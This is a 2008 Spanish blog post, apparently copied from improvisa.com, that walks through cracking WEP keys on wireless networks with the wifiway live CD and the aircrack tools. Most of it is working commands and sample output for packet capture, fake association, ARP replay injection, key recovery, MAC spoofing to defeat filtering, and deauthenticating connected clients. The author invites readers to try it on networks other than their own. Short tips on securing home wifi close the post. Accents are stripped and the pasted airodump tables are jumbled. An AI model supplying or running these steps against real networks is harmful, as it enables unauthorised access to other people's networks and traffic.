18 Abr 08

Manual para hackear una red wifi

Por Sr. Cuguero ShareThis Categoras: General Tags: Hack, Wep, Wireless Manual sacado de improvisa.com al que he llegado por El blog de Alcanjo

Con este manual intentaremos demostraros lo fcil que es que os rompan la clave WEP de vuestra red inalmbrica. Hablaremos de como realizar este hack con inyeccin de paquetes ARP con la tarjeta Intel 3945 ABG, posibles errores y como no, posibles soluciones. Tambin lo he conseguido con las tarjetas con chipset Zydas. Por daros una idea de lo simple que es, a una distancia medio razonable, un par de centenar de metros, una conexin de un cliente autenticado y unos 10 minutos nos bastarn para hackear cualquier WEP de cualquier longitud, a mayor longitud de clave WEP algo ms de tiempo. Sin ms pongamonos manos a la obra: Para el experimento hemos utilizado la distribucin en CD LIVE de www.seguridadwireless.net concretamente la distribucin se llama wifiway 0.6 (ya existe la versin 0.8, si alguien prueba con ella que nos cuente) y podemos descargarla de estos dos sitios, recomiendo el segundo (bastante ms rpido): ftp://files.tuto-fr.com:8080/distro/wifiway-0.6.iso http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso Una vez que tenemos descargada y quemada la nueva distribucin la meteremos en nuestro portatil, debe tener la tarjeta Intel 3945 ABG con la que seremos capaces de inyectar paquetes, lo bueno de esta tarjeta es que a da de hoy viene en un montn de porttiles.

El fallo que le he visto a la distribucin es que debemos saber de antemano cual ser nuestro objetivo, ya que una vez que entramos a WifiWay 0.6 debemos saber el canal que queremos atacar. Podemos por ejemplo saber esto con swscanner (netstumbler para linux, de Ivan Forcada) o con netstumbler (para windows), una vez que tenemos el canal del objetivo arrancamos WifiWay. Despues de haberle dicho nuestra zona de tiempo y nuestro idioma, nos dejara en una consola, pulsad ah startx, nos arrancara las X de la distribucin. Lo curioso de la distribucin es que divide la tarjeta Intel 3945 ABG en dos interfaces, la rtap0 para escuchar en modo monitor y la wifi0 para inyectar cdigo al AP Objetivo. Como ya sabemos el canal del objetivo es hora de lanzar el script que nos trae para la configuracin de nuestra tarjeta, abriremos una consola y teclearemos: wifiway:/# ipw3945_es.sh Nos preguntar el canal, el que hayamos sacado con swscanner No preguntar el Rate de captura, siempre a 2 Y por ultimo la MAC del AP Objetivo: yo aqu de primeras le doy la 00:11:22:33:44:55 Ahora lanzamos en la misma consola: wifiway:/# airodump-ng rtap0
CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 PWR RXQ 11 16 Beacons 10 57 PWR 51 19 -1 #Data, #/s 0 14 Lost 2 0 0 0 1 CH 11 9 MB ENC CIPHER

BSSID AUTH ESSID 00:09:5B:1C:AA:1D NETGEAR 00:14:6C:7A:41:81 bigbear BSSID 00:14:6C:7A:41:81 (not associated) 00:14:6C:7A:41:81

54. OPN 11 WEP Probes mossy WEP

34 100 STATION

Packets 14 4 5

00:0F:B5:32:31:31 00:14:A4:3F:8D:13 00:0C:41:52:D1:D1

Debemos apuntar (o copiar seleccionando, para los no iniciados en linux, copiar se hace simplemente seleccionando y pegar con los dos botones a la vez del ratn) la MAC del AP Objetivo y su ESSID. Lancemos de nuevo el script para la tarjeta Intel 3945 ABG, pero esta vez dicindole la MAC del AP de verdad: wifiway:/# ipw3945_es.sh Canal: El correspondiente al AP Objetivo Rate : 2 MAC : MAC del AP Objetivo

Ya tenemos preparada la tarjeta para empezar a inyectar cdigo, tecleando en la misma consola los siguientes cdigos, mandaremos con nuestra Intel 3945 ABG un paquetito de asociacin al AP Objetivo: wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-) Acabamos de ver que se ha autenticado contra el AP, es decir aceptar todo lo que le mandemos siempre y cuando vaya encriptado con la wep, lo que haremos ahora ser capturar paquetes encriptados y reenviarlos de nuevo al AP, previa copia en nuestro disco duro para posterior anlisis: wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0 Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets... Ahora es momento de abrir otra consola y poner a capturar a airodump: wifiway:/# airodump-ng -w /tmp/dump rtap0
CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47 PWR RXQ 11 16 Beacons 10 57 PWR 51 19 -1 #Data, #/s 0 14 Lost 2 0 0 0 1 CH 11 9 MB ENC CIPHER

BSSID AUTH ESSID 00:09:5B:1C:AA:1D NETGEAR 00:14:6C:7A:41:81 bigbear BSSID 00:14:6C:7A:41:81 (not associated) 00:14:6C:7A:41:81

54. OPN 11 WEP Probes mossy WEP

34 100 STATION

Packets 14 4 5

00:0F:B5:32:31:31 00:14:A4:3F:8D:13 00:0C:41:52:D1:D1

Vale debemos esperar a que la primera consola, en la que est corriendo el aireplay -3 a que capture algn paquete ARP y en cuanto lo haga empezar a inyectar para generar trfico encriptado con la clave WEP del AP Objetivo. En cuanto esto ocurra en la segunda consola, en la que esta corriendo airodump, empezaremos a ver como el numero de paquetes DATA del Ap Objetivo empieza a subir. Cuando debemos parar, buena pregunta, para claves de 64 bits con 200.000 paquetes DATA ser suficiente, para claves de 128 bits, unos 400.000.... Como no sabemos de que tamao es la clave podemos esperar a tener 200.000 DATA y en una tercera consola, sin parar ninguna de las otras dos, ejecutar:

wifiway:/# aircrack-ptw /tmp/dump-01.cap This is aircrack-ptw 1.0.0 For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ allocating a new table bssid = 00:19:5B:97:F3:64 keyindex=0 stats for bssid 00:19:5B:97:F3:64 keyindex=0 packets=21938 Found key with len 13: 44 44 44 44 44 44 44 44 44 44 44 44 44 Si nos da la clave ya podremos parar las otras consolas, si aun no nos la da seguiremos esperando..... 10 minutos despues............... Seguro que ya la tenemos. Con el Chipset de Zydas (Aadido el 9-Octubre-2007) Con el chipset de Zydas es incluso ms simple, no necesitaremos lanzar ningun script, directamente nos escuchara en todos los canales y autonegociar el Rate. Debemos seguir todas las instrucciones que se siguen para el driver de Intel, dejar claro que el driver de Zydas NO divide la interfaz en rtap y wifi0. Nos lo dejara como eth2 o eth1, dependiendo de las interfaces que tengamos. Utilizaremos para todo la misma interfaz, la que tenga nuestra tarjeta con driver Zydas. Problemas con los que nos podemos encontrar: NO TENGO ESPACIO EN /tmp/: Como os he dicho una vez que alguien conecte a ese AP lo tendremos en cuestin de 10 minutos, pero hasta que alguien conecte pueden pasar horas incluso das, el problema que nos encontramos al lanzar airodump-ng -w /tmp/dump rtap0 es que tenemos poco espacio, no hay problema WifiWay monta por defecto nuestras particiones NTFS o FAT32, las deja en /mnt/sda.... Lancemos (en mi caso, tengo una carpeta llamada comparto en mi segunda particion NTFSm ah si que hay gigas): wifiway:/# airodump-ng -w /mnt/sda5/comparto/dump rtap0 Con esto podemos esperar hasta semanas a que el AP Objetivo reciba una conexin. NO ASOCIA CON aireplay-ng -1 0 Muy bien se puede deber a un par de cosas, por lo que a mi me ha ocurrido. No tenemos la seal suficiente (esto deberiamos saberlo con swscanner o netstumbler), sigue intentandolo, pero te aseguro que la distancia es importante, despues lo tendrs bastante fastidiado en la inyeccin de paquetes, veras que no suben :-(, intenta acercarte. Si estas seguro de tener seal suficiente, entonces seguramente el AP tenga Filtro MAC, no ocurre nada, podremos HAckearlo exactamente igual, con un par de trucos:

Si os fijis airodump tiene dos apartados, uno para APS Objetivos (la parte de arriba) y otra parate de clientes conectados (la de abajo), cuestin de esperar a que un cliente con una mac valida se conecte al AP Objetivo y genere trafico, de esta forma sabremos que la MAC es valida para el AP, copiaremos esa MAC y cambiaremos la nuestra por la del cliente con este cdigo: wifiway:/# ifconfig wifi0 hw ether MAC_CLIENTE_AUTENTICADO Ahora debemos comenzar el proceso exactamente igual pero poniendo nuestra "nueva" MAC. INYECTA ARP PERO NO SUBEN LOS DATA Casi seguro que es por distancia, en un par de experimentos me ha ocurrido eso, no sube o sube muy lento en relacin con los paquetes ARP inyectados, es cuestin de distancia, los paquetes enviados al AP no le llegan. Mi consejo es que vayis probando con la vuestra y luego con alguna otra ;-) Si alguien tiene algn problema ms que lo vaya escribiendo en el FORO e iremos intentando resolver todas las dudas. El caso es que el AP al que estamos conectandonos nos desautentica, se soluciona volviendo a asociarse con: wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0 Podemos utilizar el truco de Tase, podemos poner en la linea de comando lo siguiente: wifiway:/# while [true] do aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0; sleep 180 done HAY DATA PERO NO ARP Esto se debe a que cuando te has puesto a inyectar paquetes el cliente ya estaba conectado y no genera paquetes ARP, hay dos soluciones, una es esperar a que vuelva a conectarse y otra segunda es enviar un paquete de falsa desautenticacin al AP para que desconecte al cliente que est asociado y de esa forma el cliente tenga que volver a asociarse, generando de esta forma paquetes ARP para su posterior inyeccin, para hacerlo debemos teclear en una consola nueva lo siguiente, sin cancelar ninguna de las otras (bendito aireplay-ng ;-)): wifiway:/# aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENTE_A_DESAUTENTICAR wifi0 CONVERSOR UNIVERSAL DE CODIFICACIONES He puesto en Improvisa un Conversor Universal para pasar de cualquier cdigo a cualquier cdigo, por si alguien quiere cambiar la clave de HEX. (que es como nos la va a dar aircrack-ptw) a ASCII, podeis visitarlo aqu, tambien en la seccin de Informtica en el rbol de la izquierda.

Conversor Universal en Improvisa SOLUCIONES PARA ASEGURAR NUESTRA WIFI: Utilicemos, si nos es posible, WPA, bastante mas difcil de hackear (tambin es posible, a lo mejor el prximo experimento es con WPA). Utiliza cable, no se porque pero los que conocen un poquitn el mundo del wifi siempre intentan tener cable ;-) La que mas me gusta es, comparte la wifi, la mayora de nosotros estamos obsesionados con que no nos entren en la wifi, pero por que?, podemos montarnos un NoCatSplash, la gente entrar a nuestra wifi con un ancho de banda mximo y encima le recibiremos con una pagina del tipo: Est usted navegando gracias a la wifi del Vecino del 3 F, no me cobren la comunidad o alguna gracias de esas ;-). Para montar NoCATSpalsh necesitaremos un Openwrt, y un hardware que lo soporte, unos 60 euros. Si no queremos gastarnos nada y tenemos un servidor tambin podemos hacerlo con Squid y CAPO, un plugin para Squid que funciona igual que NoCatSplash. Estas dos tcnicas son las que utilizamos en la Red Inalmbrica de Guadalajara GuadaWireless.